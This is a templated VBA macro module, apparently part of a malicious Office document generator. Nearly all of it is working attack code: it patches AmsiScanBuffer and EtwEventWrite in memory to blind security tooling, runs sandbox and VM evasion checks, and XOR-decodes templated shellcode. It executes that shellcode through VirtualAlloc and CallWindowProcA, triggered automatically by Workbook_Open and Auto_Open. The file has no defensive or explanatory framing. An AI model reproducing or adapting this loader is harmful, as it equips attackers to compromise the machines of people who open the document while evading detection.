Attribute VB_Name = "{{ v.module_name }}"
Option Explicit

#If VBA7 Then
    Private Declare PtrSafe Function {{ v.fn_valloc }} Lib "kernel32" Alias "VirtualAlloc" _
        (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, _
         ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" _
        (ByVal Destination As LongPtr, ByRef Source As Any, ByVal Length As Long) As LongPtr
    Private Declare PtrSafe Function {{ v.fn_callwp }} Lib "user32" Alias "CallWindowProcA" _
        (ByVal lpPrevWndFunc As LongPtr, ByVal hWnd As LongPtr, _
         ByVal Msg As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
    Private Declare PtrSafe Function VirtualProtect Lib "kernel32" _
        (ByVal lpAddress As LongPtr, ByVal dwSize As Long, _
         ByVal flNewProtect As Long, ByRef lpflOldProtect As Long) As Long
    Private Declare PtrSafe Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As LongPtr
    Private Declare PtrSafe Function GetProcAddress Lib "kernel32" _
        (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
    Private Declare PtrSafe Function GetCursorPos Lib "user32" (lpPoint As Any) As Long
#End If

Private Function {{ v.fn_build_str }}(codes() As Integer) As String
    Dim s As String, i As Long
    For i = 0 To UBound(codes)
        s = s & Chr(codes(i))
    Next
    {{ v.fn_build_str }} = s
End Function

Private Sub {{ v.fn_amsi_patch }}()
    On Error Resume Next
    Dim amsiCodes(5) As Integer
    amsiCodes(0)=97:amsiCodes(1)=109:amsiCodes(2)=115:amsiCodes(3)=105
    amsiCodes(4)=46:amsiCodes(5)=100
    Dim amsiCodes2(1) As Integer: amsiCodes2(0)=108:amsiCodes2(1)=108
    Dim amsiLib As String: amsiLib = {{ v.fn_build_str }}(amsiCodes) & {{ v.fn_build_str }}(amsiCodes2)
    Dim fnCodes(13) As Integer
    fnCodes(0)=65:fnCodes(1)=109:fnCodes(2)=115:fnCodes(3)=105
    fnCodes(4)=83:fnCodes(5)=99:fnCodes(6)=97:fnCodes(7)=110
    fnCodes(8)=66:fnCodes(9)=117:fnCodes(10)=102:fnCodes(11)=102
    fnCodes(12)=101:fnCodes(13)=114
    Dim scanName As String: scanName = {{ v.fn_build_str }}(fnCodes)
    Dim amsiBase As LongPtr: amsiBase = LoadLibraryA(amsiLib)
    If amsiBase = 0 Then Exit Sub
    Dim scanAddr As LongPtr: scanAddr = GetProcAddress(amsiBase, scanName)
    If scanAddr = 0 Then Exit Sub
    Dim oldP As Long
    VirtualProtect scanAddr, 6, &H40, oldP
    Dim patch(0 To 5) As Byte
    patch(0) = &HB8: patch(1) = &H57: patch(2) = &H0: patch(3) = &H7: patch(4) = &H80: patch(5) = &HC3
    RtlMoveMemory scanAddr, patch(0), 6
    VirtualProtect scanAddr, 6, oldP, oldP
End Sub

Private Sub {{ v.fn_etw_patch }}()
    On Error Resume Next
    Dim ntdllCodes(8) As Integer
    ntdllCodes(0)=110:ntdllCodes(1)=116:ntdllCodes(2)=100:ntdllCodes(3)=108
    ntdllCodes(4)=108:ntdllCodes(5)=46:ntdllCodes(6)=100:ntdllCodes(7)=108:ntdllCodes(8)=108
    Dim ntdllName As String: ntdllName = {{ v.fn_build_str }}(ntdllCodes)
    Dim etwCodes(12) As Integer
    etwCodes(0)=69:etwCodes(1)=116:etwCodes(2)=119:etwCodes(3)=69
    etwCodes(4)=118:etwCodes(5)=101:etwCodes(6)=110:etwCodes(7)=116
    etwCodes(8)=87:etwCodes(9)=114:etwCodes(10)=105:etwCodes(11)=116:etwCodes(12)=101
    Dim etwName As String: etwName = {{ v.fn_build_str }}(etwCodes)
    Dim ntdllBase As LongPtr: ntdllBase = LoadLibraryA(ntdllName)
    If ntdllBase = 0 Then Exit Sub
    Dim etwAddr As LongPtr: etwAddr = GetProcAddress(ntdllBase, etwName)
    If etwAddr = 0 Then Exit Sub
    Dim oldP As Long
    VirtualProtect etwAddr, 4, &H40, oldP
    Dim p(0 To 3) As Byte: p(0) = &H31: p(1) = &HC0: p(2) = &HC3: p(3) = &H90
    RtlMoveMemory etwAddr, p(0), 4
    VirtualProtect etwAddr, 4, oldP, oldP
End Sub

Private Function {{ v.fn_hex2arr }}(hex As String) As Byte()
    Dim n As Long: n = Len(hex) \ 2
    Dim arr() As Byte: ReDim arr(0 To n - 1)
    Dim i As Long
    For i = 0 To n - 1
        arr(i) = CByte("&H" & Mid$(hex, i * 2 + 1, 2))
    Next
    {{ v.fn_hex2arr }} = arr
End Function

Private Function {{ v.fn_xor }}(data() As Byte, key() As Byte) As Byte()
    Dim n As Long: n = UBound(data)
    Dim k As Long: k = UBound(key) + 1
    Dim out() As Byte: ReDim out(0 To n)
    Dim i As Long
    For i = 0 To n
        out(i) = data(i) Xor key(i Mod k)
    Next
    {{ v.fn_xor }} = out
End Function

Private Function {{ v.fn_sandbox }}() As Boolean
    {{ v.fn_sandbox }} = False
    On Error Resume Next
    If Application.Workbooks.Count < 1 Then {{ v.fn_sandbox }} = True: Exit Function
    If Application.RecentFiles.Count < 3 Then {{ v.fn_sandbox }} = True: Exit Function
    Dim usr As String: usr = LCase(Environ("USERNAME"))
    Dim badU: badU = Array("sandbox","malware","virus","sample","cuckoo","user","admin")
    Dim i As Integer
    For i = 0 To UBound(badU)
        If usr = CStr(badU(i)) Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    Dim cname As String: cname = LCase(Environ("COMPUTERNAME"))
    Dim badC: badC = Array("sandbox","malware","virus","analysis","cuckoo")
    For i = 0 To UBound(badC)
        If InStr(cname, CStr(badC(i))) > 0 Then {{ v.fn_sandbox }} = True: Exit Function
    Next
    ' VM/hypervisor registry key checks
    Dim vmKeyPath As String
    vmKeyPath = "HKLM\SOFTWARE\VMware, Inc.\VMware Tools\InstallPath"
    On Error Resume Next
    Dim regVal As String
    regVal = Environ("PROCESSOR_IDENTIFIER")  ' will be replaced by Shell.RegRead pattern
    Dim wshShell As Object
    Set wshShell = CreateObject("WScript.Shell")
    wshShell.RegRead vmKeyPath
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    wshShell.RegRead "HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions\Version"
    If Err.Number = 0 Then {{ v.fn_sandbox }} = True: Set wshShell = Nothing: Exit Function
    Err.Clear
    Set wshShell = Nothing
    Dim fso2 As Object
    Set fso2 = CreateObject("Scripting.FileSystemObject")
    On Error Resume Next
    Dim drv2 As Object
    Set drv2 = fso2.GetDrive("C:")
    If Err.Number = 0 Then
        If drv2.TotalSize < 53687091200 Then {{ v.fn_sandbox }} = True: Set fso2 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set fso2 = Nothing
    Dim wmiSvc3 As Object
    On Error Resume Next
    Set wmiSvc3 = GetObject("winmgmts:")
    If Err.Number = 0 Then
        Dim prtQ As Object: Set prtQ = wmiSvc3.ExecQuery("SELECT Name FROM Win32_Printer")
        Dim prtCnt As Long: prtCnt = 0
        Dim oPrt As Object
        For Each oPrt In prtQ: prtCnt = prtCnt + 1: Next
        If prtCnt = 0 Then {{ v.fn_sandbox }} = True: Set wmiSvc3 = Nothing: Exit Function
    End If
    On Error GoTo 0
    Set wmiSvc3 = Nothing
End Function

Private Sub {{ v.fn_exec }}()
    If {{ v.fn_sandbox }}() Then Exit Sub
    ' Record cursor before delay; check movement after — no extra wait
    Dim _pt1(1) As Long, _pt2(1) As Long
    GetCursorPos _pt1(0)
    ' Execution delay to defeat sandbox timing
    Dim tStart As Date: tStart = Now
    Do While DateDiff("s", tStart, Now) < 2: DoEvents: Loop
    GetCursorPos _pt2(0)
    If _pt1(0) = _pt2(0) And _pt1(1) = _pt2(1) Then Exit Sub
    Call {{ v.fn_amsi_patch }}
    Call {{ v.fn_etw_patch }}

    Dim sc_hex As String, key_hex As String
    sc_hex  = {% for chunk in shellcode_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}
    key_hex = {% for chunk in key_chunks %}"{{ chunk }}"{% if not loop.last %} & {% endif %}{% endfor %}

    Dim raw() As Byte, key() As Byte, sc() As Byte
    raw = {{ v.fn_hex2arr }}(sc_hex)
    key = {{ v.fn_hex2arr }}(key_hex)
    sc  = {{ v.fn_xor }}(raw, key)

    Dim mem As LongPtr
    mem = {{ v.fn_valloc }}(0, UBound(sc) + 1, &H3000, &H04)
    RtlMoveMemory mem, sc(0), UBound(sc) + 1
    Dim oldP As Long
    VirtualProtect mem, UBound(sc) + 1, &H20, oldP

    {{ v.fn_callwp }} mem, 0, 0, 0, 0
End Sub

Public Sub Workbook_Open()
    Call {{ v.fn_exec }}
End Sub

Public Sub Auto_Open()
    Call {{ v.fn_exec }}
End Sub
